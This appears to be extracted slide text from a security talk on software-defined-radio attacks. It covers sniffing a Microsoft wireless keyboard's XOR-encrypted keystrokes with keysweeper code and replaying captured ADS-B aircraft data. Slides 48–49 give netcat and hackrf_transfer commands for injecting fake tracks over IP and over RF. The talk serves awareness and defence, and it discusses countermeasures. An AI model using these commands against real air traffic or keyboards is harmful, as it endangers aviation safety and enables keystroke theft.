  • 27. Get BIT sequence bit = Vfm > 0 ? 0:1 111111111111001100010000000000100110111110111111111111111111111111 111111111110010101010101010010011001111100101000101101100111001000 000000001010011110000001110100000001010011100001110110100110001100 111010100111101110000010001110010100110011100111001110011100011110 111110100111000111111111111100110010000000000001111111011111111111 111101111111101111111111111111111111111111111001010101010101001001 100111110010100010110110011100100000000000101001111000000111010000 000101001110000111011010011000110011101010011110111000001000111001 010011001110101001110011100111000111101111101001110101111111111100 110000001000100010001111111111111111111111111011111111111111111111 101010101001011001111100101000101101100111001000000000001010011110 000001110100000001010011100001110110100110001100111010100111101110 000010001110 ………. 27
  • 28. nRF24L01 Packet format  Preamble  0xAA | 0x55  Address  3-5 Byte  PCF  9 bit  Payload  0- 32Byte  CRC  1-2 byte http://www.nordicsemi.com/eng/Products/2.4GHz-RF/nRF24L01 28
  • 29. KeyKeriki Project results ・ Microsoft   Wireless Keyboard 800’s device address is composed of 5 byte start from 0xCD ・ Keystroke is encrypted by simple XOR operation using this device address http://www.remote-exploit.org/content/keykeriki_v2_cansec_v1.1.pdf 29
  • 30. Get BIT sequence bit = Vfm > 0 ? 0:1 111111111111001100010000000000100110111110111111111111111111111111 111111111110010101010101010010011001111100101000101101100111001000 000000001010011110000001110100000001010011100001110110100110001100 111010100111101110000010001110010100110011100111001110011100011110 111110100111000111111111111100110010000000000001111111011111111111 111101111111101111111111111111111111111111111001010101010101001001 100111110010100010110110011100100000000000101001111000000111010000 000101001110000111011010011000110011101010011110111000001000111001 010011001110101001110011100111000111101111101001110101111111111100 110000001000100010001111111111111111111111111011111111111111111111 101010101001011001111100101000101101100111001000000000001010011110 000001110100000001010011100001110110100110001100111010100111101110 000010001110 ………. find to “0x0A78 (0000101001111000)” Packet control field 9 bit Devie ID Preamble 8bit + address 5 byte + packet control 9bit + payload 30
  • 31. Device ID detection { P.A. } { [p0] p[1] [p2] [p3] [p4]} AA A9 33 E5 16 CE 10101010 10101001   00110011   11100101   00010110   11001110 {PktCTL Bit} 0A 78 1D 01 010000000 00001010 01111000 00011101 00000001 { payload ....... 0100111000011101101001100011001110101001111011100…… // From keysweeper_mcu_src   https://github.com/samyk/keysweeper if (radio.available()) { radio.read(&p, PKT_SIZE); if (p[4] == 0xCD) // 0xCD -> 0xCE for Japanese KBD { sp("Potential keyboard: "); DEVICE ID 31
  • 32. Behavior after (0xCD->0xCE) {………………} Tuning to 2479 Tuning to 2480 Potential keyboard: A9 33 E5 16 CE 43 5 3C KEYBOARD FOUND! Locking in on channel 80 2setupRadio 16: 0A 78 1D 01 56 03 43 00 00 1E 00 00 00 00 00 8F <- Key 1 Press > 1 8: 0A 38 1D 01 56 03 00 84 16: 0A 78 1D 01 57 03 43 00 00 00 00 00 00 00 00 90 <- Key OFF 16: 0A 78 1D 01 58 03 43 00 00 1F 00 00 00 00 00 80 <- Key 2 Press > 2 8: 0A 38 1D 01 58 03 00 8A {………………} (*1) USB HID usage table: http://www.freebsddiary.org/APC/usb_hid_usages.php (*1) 32
  • 34. Summary #1  Using GNU Radio, find the device address KEY (0xCE) of the Microsoft Wireless Keyboard 800 Japanese edition  Change the device address KEY to 0xCE, then monitor keylogger Behavior.  Don’t use wireless keyboard, when the operation with sensitive information. Especially, warn against using proprietary specification device. Caution  Experiment in Japan, signal from nRF24L should be invalidated • boolean shoutKeystrokes = true; -> false; 34
  • 35. Attack demo #2  Replay attack for ADS-B(*1) mounted on aircraft Aviation is part of the critical infrastructure ADS-B is next generation air traffic control system Attack demo played in Blackhat2012, DEFCON20, ...etc. Applying SDR technology, tried to replay the attack (*1)Automatic Dependent Surveillance–Broadcast 35
  • 36. Congestion in the Skies http://www.flightradar24.com/ 36
  • 37. ADS-B overview  Because old radar’s positional accuracy was 1-2 NM, there was a need to widen the service interval to ensure the safety of aircraft operation.  To keep up with aircraft increasing, new system is needed. ADS-B, using GPS, to provide a highly accurate position information, has been developed as next generation air traffic control system in 1980-1990.  Now, about 70 % of passenger plane have ADS-B    (Source http://www.flightradar24.com/how-it-works)  Required to equip until 2017 in Europe, until 2020 in the United States  Point at issue  No encryption  Broadcast with no authentication  Simple encoding and simple modulation scheme 37
  • 38. Mechanism of ADS-B  ADS-B Automatic Dependent Surveillance–Broadcast Using broadcast datalink, Aircraft transmits own location, speed, altitude, and so on obtained from measuring system such as GPS. Image   http://www.enri.go.jp/news/osirase/pdf/e_navi10.pdf 38 GPS location Broadcast Datalink Control Center Ground Receiving Station
  • 39. Papers related to ADS-B  About Vulnerability  Donald L. McCallie, Major, USAF   (2011) • http://apps.fcc.gov/ecfs/document/view.action?id=7021694523  Andrei Costin, Aurelien Francillon, BlackHat2012 • https://media.blackhat.com/bh-us- 12/Briefings/Costin/BH_US_12_Costin_Ghosts_In_Air_Slides.pdf  Brad render, DEFCON20  ( 2012 ) • http://korben.info/wp-content/uploads/defcon/SpeakerPresentations/Renderman/DEFCON-20- RenderMan-Hackers-plus-Airplanes.pdf  Hugo Teso, CyCon2013 (2013) • https://ccdcoe.org/cycon-2013.html  About Countermeasures  Martin Strohmeier, Ivan Martinovic 、 (2014) • Detecting False-Data Injection Attacks on Air Traffic Control Protocols • http://www.cs.ox.ac.uk/files/6604/wisec2014-abstract.pdf  Kyle D. Wesson,Brian L. Evans, and more. (2014) • Can Cryptography Secure Next Generation Air Traffic Surveillance? • https://radionavlab.ae.utexas.edu/images/stories/files/papers/adsb_for_submission.pdf  Seoung-Hyeon Lee , Yong-Kyun Kim, Deok-Gyu Lee, and more. (2014) • Protection Method for Data Communication between ADS-BSensor and Next-Generation Air Traffic Control Systems • http://www.mdpi.com/2078-2489/5/4/622 39
  • 40. Expected threats Snoop (Eavesdropping) Jamming Fake aircraft’s wake injection (Fake track injection) 40
  • 41. How to receive ADS-B?  Receive the radio waves USB stick for receiving overseas digital TV It’s about 1000 JPY to 2000 JPY  Process the signal and display PC •Windows, Mac, Linux Smartphone, Tablet 41
  • 42. ADS-B receiver software  Decoder  ADSB# http://airspy.com/index.php/downloads/  RTL1090 http://rtl1090.web99.de/  Modesdeco2 (w/ display function) • http://radarspotting.com/forum/index.php/topic,2978.msg13471.html  dump1090 (w/ display function) • https://github.com/antirez/dump1090  Display  Virtual Radar Server http://www.virtualradarserver.co.uk/  adsbSCOPE • http://www.sprut.de/electronic/pic/projekte/adsb/adsb_en.html#downloads  PlanePlotter http://www.coaa.co.uk/planeplotter.htm 42
  • 44. ADS-B format  Format  Actual received I/Q signals https://media.defcon.org/DEF%20CON%2020/DEF%20CON%2020%20slides/DEF%20CON%2020%20Hacking%20Conference %20Presentation%20By%20RenderMan%20-%20Hacker%20and%20Airplanes%20No%20Good%20Can%20Come%20Of%20This %20-%20Slides.m4v 44
  • 45. Waveform monitoring with GNU Radio (I2 + Q2 )I/Q 45
  • 46. Received ADS-B (e.g.) *8d7583a5585b575a9ebc4bbb3f04; CRC: 000000 (ok) DF 17: ADS-B message. Capability : 5 (Level 2+3+4 ) ICAO Address : 7583a5 Extended Squitter Type: 11 Extended Squitter Sub : 0 Extended Squitter Name: Airborne Position ……. F flag : odd T flag : non-UTC Altitude : 17125 feet …………. Raw data in hex Aircraft location data, ...etc. I/Q signal after A/D convert Demodulation / Decode Parse the data 46
  • 47. Attack Vector IP NetworkIP Network ADS-B Receiving Station ADS-B Receiving Station ADS-B Receiving Station ADS-B Broadcast GPS Satellite Actor V2 V3 Image http://www.mlit.go.jp/koku/koku_fr14_000007.html V1 47
  • 48. Replay Attack (V1)  Intercepted raw data ( File name: xxxx.raw)  Inject the raw data via IP network $cat xxxx.raw | nc target_IP target_PORT ※In reality, the adversary needs to find a way to get through the authentication in order to connect to the target server. *8d869210581fe3bf4350dfd62439; *5da40455385715; *8d86dca29914ee0f20f410ef2595; *8d780c3c581db79c18a4b0ffc872; *8d867f609914b993e8700ba91251; *02a1839b9e229d; *…………… 48
  • 49. Replay Attack (V2)  Create an ADS-B pulse signal file from the raw data  $cat xxxx.raw | ./adsb-pulsegen test_file.bin  Use the file to generate a RF signal modulated  $hackrf_transfer –f 1090MHz –s 2MHz –t test_file.bin –x 0 *8d869210581fe3bf4350dfd62439; *5da40455385715; *8d86dca29914ee0f20f410ef2595; *8d780c3c581db79c18a4b0ffc872; *8d867f609914b993e8700ba91251; *02a1839b9e229d; *0261819c1d1e5a; …………… 49
  • 50. DEMO  Injection via IP network (V1) Real-time interception of ADS-B signal and display on map Inject the raw data received in the past  Injection via RF channel (V2) Generate an I/Q signal file from the received raw data Inject the RF signal modulated by the I/Q signal 50
  • 52. ADS-B RF injection RF injection demo screen shot 52
  • 53. Security of air traffic control?  Why doesn’t it get renewed?  Threat not being recognized  To preserve safety and interoperability  International discussion takes a long period of time • Forming consensus • Development • Deployment Image http://www.jatcaonline.com/SSR_system.JPG https://upload.wikimedia.org/wikipedia/commons/f/fe/D-VOR_PEK.JPG ASR/SSR ILS ( glide slope / Localizer ) VOR/DME 53
  • 54. Summary #2  Technically, an attack against ADS-B is extremely easy  Not only ADS-B but any air traffic control system that relies on radio waves are vulnerable to jamming attacks.  Possible attack scenarios  Terrorists or nation state actors injects false flight paths or performs jamming attacks to confuse the air traffic control as one of the ways to accomplish an objective.  Is it hard to implement early countermeasures? ( Requires an international consensus )  A mitigation plan such as detecting interception or using tracking algorithms must be considered  Create an environment that enhances virtual trainings and incident response plan 54
  • 55. Conclusion  Due to the emerge of the software defined radio experiment tool GNU Radio and the low cost RF related hardware, the technical threshold to carry out an RF attack has been lowered  The existing systems that relies on radio waves such as the air traffic control system, has not been able to follow the modernization which the commercial technology like WIFI or smartphone has gone through  A fundamental countermeasure will require a long period of time  Compensating the lack of countermeasure with operational practice will require an enhanced incident response plan and trainings 55
  • 57. 57 Copyright 2010 FUJITSU LIMITED